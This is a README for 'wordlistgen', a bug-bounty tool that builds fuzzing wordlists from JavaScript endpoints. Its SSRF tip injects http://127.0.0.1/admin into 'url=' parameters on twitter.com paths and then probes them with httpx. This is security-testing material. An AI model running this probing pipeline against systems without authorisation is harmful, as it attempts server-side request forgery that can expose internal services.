wordlistgen
Generates target specific word lists by searching for endpoints in javascript and appends parameters for Fuzzing with other tools
Version 1.0
Install
$ go get -u github.com/ethicalhackingplayground/wordlistgen
$ go get github.com/003random/getJS
Generate wordlist
$ echo "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "https://www.twitter.com"
The use ffuf
Then get creative with FFuF or https://github.com/tomnomnom/qsreplace
SSRF TIP2:
Generate Wordlist
$ cat <Resolved-Domains> | getJS -complete | ./wordlistgen -p params.txt -d <Un-Resolved> | tee wordlist
$ cat "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "www.twitter.com" | tee wordlist
OUTPUT:
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=FUZZ
www.twitter.com/v/latest/72x72//?url=FUZZ
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=FUZZ
www.twitter.com/articles/18311/?url=FUZZ
-dL
to load a list of subdomains like:
You can also use $ cat <Resolved-Domains> | getJS -complete | ./wordlistgen -p params.txt -dL <Un-Resolved> | tee wordlist
Replace Variables with Payload
$ cat wordlist | qsreplace http://127.0.0.1/admin | tee -a hosts
OUTPUT:
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/v/latest/72x72//?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/articles/18311/?url=http%3A%2F%2F127.0.0.1%2Fadmin
Use HTTPX to keep track of the codes,titles
$ cat hosts | httpx -title -status-code
I hope you get a bounty with this technique.
If you get a bounty please support by buying me a coffee